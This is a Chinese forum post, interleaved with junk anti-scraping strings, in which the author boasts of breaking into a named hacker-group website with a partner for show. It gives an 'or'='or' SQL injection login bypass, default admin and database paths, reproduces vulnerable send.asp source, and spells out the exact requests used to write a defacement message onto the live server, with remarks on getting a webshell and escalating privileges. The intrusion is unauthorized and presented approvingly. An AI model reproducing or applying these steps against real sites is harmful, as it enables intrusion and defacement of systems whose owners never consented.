中国网络渗透测试联盟
标题:
入侵华东黑客联盟装X的过程
[打印本页]
作者:
admin
时间:
2012-11-6 21:06
标题:
入侵华东黑客联盟装X的过程
有些朋友对我和云中鹰搞华东的过程比较感兴趣,其实那个很没技术含量
8 F% H; t) Q4 D4 M( s
今天闲着无聊,把手上的项目葛一下,来论坛放松一下,顺便说说上次搞华东黑客联盟到装B的过程
6 L b3 x) u2 _7 F1 e3 V, t
这天云中鸡说华东的某人很牛X,利用JPG黑站大法把恶灵战队黑了,还发了个demo出来
+ J! x: W8 p" V) f! z
我去看了一下demo,感觉很黑客,于是就和云中鸡搞了一下华东
+ V( r, g* W4 g3 L! o% j
首先,我记得华东只被人搞过一次(记性不好,原谅下~~),所以应该防护还是比较好的
. |/ h a# P: X, F
服务器应该防ARP,不过这还只是猜测
5 [& ~ ~# n W
云中鸡说先不搞C段,PZ一下再说
+ M% H2 F% o0 X7 n, w, C% o& V
然后我就打开了
链接标记[url=http://www.3hack.com
www.3hack.com[/url[/url]]
+ q3 e& z) n, L0 v7 ?
一看,我晕,怎么网站变了................以前我比较喜欢到华东去看动画,现在怎么变成这鸟样了,晕..............
! z- J: t9 c# `6 I* b8 N! j
这时候云中鸡丢了一个同F的站过来,说进了后台搞不了shell
+ p" |0 w& k' _+ t- z6 j
我看了下搞到了一个webshell出来(这里涉及点技巧,不过不是重点,故省略....),登上webshell后发现服务器的权限很BT
) s7 l+ H, a# c) w! o
然后我就把shell丢给云中鸡去提权,过了一会儿找到了一个二级玉米的站shop.xiahack.cn
; P* ]. w9 P! R( T
看着是用eshop来架设的网店,虽然不是同F,但还是想搞下他看有什么可利用的地方,用了几个0day去搞发现不是最新版,0day用不鸟
6 y; Z: G3 S8 u o& p
问了下云中鸡提权怎样了,他说还在努力,装不鸟B就不睡觉,晕了,这下入侵陷入了僵局...............
( D4 c3 ~6 @7 ]2 V, e+ d
无聊到网上乱逛,这时无意中发现一个阿拉伯XXXXXX,具体就不说啥鸟,呵呵~~
4 h s0 X7 X' ?% G( K
然后阿拉伯黑客发现了
链接标记[url=http://www.3hack.com
www.3hack.com[/url[/url]]上有个xia的目录很可疑,于是我就去看看是什么
7 m8 J, B- s( P- m2 z; X
打开一看,如图1所示。
1 r8 C/ |4 t* v! b/ \- B9 C
^& @( ~! @1 H
http://00day.cn/forum/attachment/thumb/6_1_a8d665f343765b2.jpg
" V! o3 N$ [8 a6 W2 l; b
我靠~~这啥东西?这么帅?点进去一看,如图2所示。
/ [: \/ ]/ S7 L" T8 P* A
. \& A- q- V# H$ } c4 f Z
http://00day.cn/forum/attachment/thumb/6_1_d741c5c7b6b8a48.jpg
8 a7 u- q! o5 E+ U u4 P
太帅了,真YD!!
% U, |: v4 M- ^ R9 l# k7 y
这个页面应该是一套个人主页程序,而且还挺炫的!
: E2 R m0 J) ?
这个页面有发表日志的地方,应该可能存在登陆页面,找了一轮后发现当鼠标放到网页顶端的时候就会弹出登陆页面,如图3所示。
0 V9 v0 y0 k( z
8 I$ S( I5 z- P
http://00day.cn/forum/attachment/6_1_b03700cb2fe5d52.jpg
' s8 R# B, L4 T, L: A
嘿嘿,试着'or'='or'居然进去了!!如图4所示。
1 P0 g- D2 K2 g3 d6 J' @7 X; b7 ?0 u
$ o3 J. O8 {! K8 f: o
http://00day.cn/forum/attachment/6_1_7107004af344a3c.jpg
/ R; h' C4 n+ H. r V
经过半个多小时的摸索,还是没有发现可利用的地方。
p* |& C( _' h, W+ A9 o
这下郁闷了,不管了,把这套程序下载下来看看吧
5 d9 p. S3 m# @( U' a! l. ?& u( {
找了一会才知道这套程序叫做“V时代个人flash主页”
% A H) M4 R* k2 W: ?1 {: C+ b
到官方下了套最新版,然后找了一下可利用的地方,不一会,我发现“/html/admin”这个目录很可能可以利用
9 M* X" ]+ O! `2 ]* _3 s" E
于是马上打开
链接标记[url=http://www.3hack.com/xia/html/admin
http://www.3hack.com/xia/html/admin[/url[/url]]
~1 I: _2 M) I1 I1 r& y
返回的确实找不到页面,郁闷了,输入
链接标记[url=http://www.3hack.com/xia/html/
http://www.3hack.com/xia/html/[/url[/url]]
9 P4 o& i9 K3 X0 d1 i. g
同样是找不到页面,真晕!再看看!
6 d$ d2 w; v2 V
5分钟过后,我发现后台地址是“/asp”,默认数据库是“/asp/vshidai.mdb”,嘿嘿!这下你不死定了!
. M! O* R x' z. _$ | e$ q
马上打开
链接标记[url=http://www.3hack.com/xia/asp/vshidai.mdb
http://www.3hack.com/xia/asp/vshidai.mdb[/url[/url]],我晕!服务器居然设置了mdb后缀映射,下载不了!
& |; g/ Z: K4 N% _7 f% @& l6 }9 z) ^
打开
链接标记[url=http://www.3hack.com/xia/asp/
http://www.3hack.com/xia/asp/[/url[/url]],发现返回空白,这下我真是服了!
( h* S0 _& u; f* `, g3 F' X' Q
希望快覆灭了,这时我点到了根目录下的send.asp文件,看到里面存在着一个有意思的东西,代码如下:
5 l$ s3 s. U" M q) f- ^
& Z# ^. T) V) Z
var a
+ U+ V2 c4 s# P, E- Y4 Z
var b
* b, S/ _. ^ z* y q. M( B: h; L( u
var tx
5 U0 H) t# T& N
var clean
$ u5 Z7 S7 q" ^5 k- a& C. B0 L
a=Request("re")
- {& s" L8 ?* c4 _8 V& s
clean=Request("clean")
, g0 f- g7 }$ }
var jian="test.txt"
( X9 x) J0 o1 H$ d9 S6 c6 |
5 f1 m2 H7 c" T. F# k2 u9 r8 a
if(clean==1){
, B- e) a1 A6 _3 M9 L" j6 F% ~
tx="&a="
: Q8 R* ?5 ^9 p- v- W
var fs2
5 m' h5 S8 M/ u: \6 W5 y# |. Q
var fs2=Server.CreateObject("Scripting.FileSystemObject")
* b% a4 v8 c; J& |) |% i! Y
var newdt=fs2.OpenTextFile(Server.MapPath(jian),2,true)
$ e C& y1 k: Z3 L4 S3 n! Q4 V2 v
newdt.WriteLine("&a=")
& a% j8 N3 R+ R: J" r6 I! `) E. w
newdt.close()
# N5 u1 Y! G" _9 u& X
}
! e9 O* W& o$ t0 P1 S
- |* Z, t2 e2 d% R
if(clean==0|clean==1){
' ^" {7 q3 L$ P7 D: C1 R# C
tx=""
" G) a* ^+ r3 \: @9 S
var fso = Server.Createobject("Scripting.FileSystemObject")
9 i9 P) F0 v, u$ t- {
var file = fso.OpenTextFile(Server.Mappath(jian))
/ T/ a9 z4 y/ \6 {
while (!file.AtEndOfStream){
, c! S, z1 R# Z
tx=file.ReadLine()
- W" u) `; p8 v- M+ U
Response.write (tx)
1 X4 J' q0 s# L7 d: C( W
}
* X# f: h/ Z' \& ~' j* x& y
Response.write ("&")
$ w0 h: |- c! O/ D9 Z6 q' |" N" y
file.close()
@4 c0 s7 q* L, [8 L) x" L
}
3 ] R* f( g$ x6 C' M' c! {
; g0 `) g# f8 f5 c, m6 M& i
if(clean==2){
0 x% a d+ j: @# D* J
tx=""
0 [* h* P4 i' U; e V1 l1 d
var fso = Server.Createobject("Scripting.FileSystemObject")
/ c p1 Y+ R( H. ~
var file = fso.OpenTextFile(Server.Mappath(jian))
! C& E) ]" i+ K2 W5 u& B( ?
& [* Z( {$ v1 c3 e0 j4 J
var fs2
, L- K% o* q/ m9 z6 q, B) W5 M
var fs2=Server.CreateObject("Scripting.FileSystemObject")
r# C- Y1 [# o& K' U) l
var newdt=fs2.OpenTextFile(Server.MapPath(jian),8,true)
8 V+ j$ d/ \! C8 f9 k, H& S% V
/ J, }( x4 C8 l0 }8 D
+ J7 Z$ N% l6 D, E6 U
while (!file.AtEndOfStream){
, }# l3 T8 y. I* \* z
tx=file.ReadLine()
& v* `3 f l6 F* R
Response.write (tx)}
. O- s7 X5 ~( ]% G1 O0 z
2 f) U; E6 h; N3 f- B
Response.write (a+"&")
+ ]% X+ v3 \: A# j3 e( ?
newdt.WriteLine(a)
8 e) G+ ]) x) ?3 U
9 A+ D- K% Q$ H2 y
file.close()
! B; Q9 m, ]1 a
newdt.close()
" {. {; Y) p2 t
}
( F/ C- m* e6 [ X1 [3 l
1 z5 d# Q1 Y% M* g: m2 t ^
9 L/ G8 D; z- v) R1 J, N" Z
复制代码
9 Z- H. ?- ~0 b; L8 F& R+ P4 I
这下应该可以装B了!从代码看出,我们首先要提交“send.asp?clean=1”来创建一个名为test.txt的文件,文件里面写着“&a=&”
. w/ E+ V. y( `4 v$ w" M
接下来我们提交“send.asp?clean=2&re=H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”
! H* p d, f( ^2 M( `
这样就能在test.txt文件里新建一行并写入“H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”这句话
: o4 q# V0 ]3 U7 a
过程如图5、6所示。
0 g# |$ N4 H$ V$ C& N5 t+ ~9 ]' `- w
4 S' ]9 u9 _; l r# h1 E j! }- h
http://00day.cn/forum/attachment/thumb/6_1_cd66a1c03f6682b.jpg
' V6 f$ m/ y" N6 W0 G: T
+ U0 w+ Q% \8 X2 m$ u- W* A+ H
http://00day.cn/forum/attachment/thumb/6_1_942adfb1ce45224.jpg
Y% W8 g, L) u) N4 Z; ]% A' _9 w
提交后我们打开
链接标记[url=http://www.3hack.com/xia/test.txt
www.3hack.com/xia/test.txt[/url[/url]]看看,如图7所示。
2 M* W: Z; |0 A6 V( `- T* T0 z1 M
M2 c! g* e% T# W
http://00day.cn/forum/attachment/thumb/6_1_10f60a12650b618.jpg
; L3 H" H% j4 H; f+ J
这下终于可以装到X了,如果不是V时代的作者写的send.asp代码存在问题,拿到shell是不难的
# M3 C3 p5 I% ^+ E5 I
如果jian是经过request取值的话,同样也能搞到shell。
' v6 W$ F) M; |" t( i
这次只是装到了X,并没有拿到shell
; v; }5 l4 z, i( W z r5 u( y% I4 X7 a
已经是凌晨了,跟云中J说了声就睡觉去鸟
1 B7 W) A& j8 M0 Z
估计那B可能搞到了权限,不过我没问他,最近事情比较多,也比较忙
6 f% [1 ?9 I1 }
就到这里吧,没技术含量,纯粹装X,高手们见笑了
* {9 j& t5 y; M! e
另外劝告某些认为上传个JPG就能黑到站的大黑客,你这样自欺欺人吃亏的是你自己
4 Y, Q# W$ J: P( q8 T; x6 A, M% M
自己学不到技术,却还在自欺欺人
8 u$ k% I1 M* O5 b
不说了,本文到这里,最后感谢一下阿拉伯黑客,原来阿拉伯黑客也是很强大的,好了,猪大家愉快~~
* x# @& [# S- e! K6 p
9 ~: e7 z! d" ?. |
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2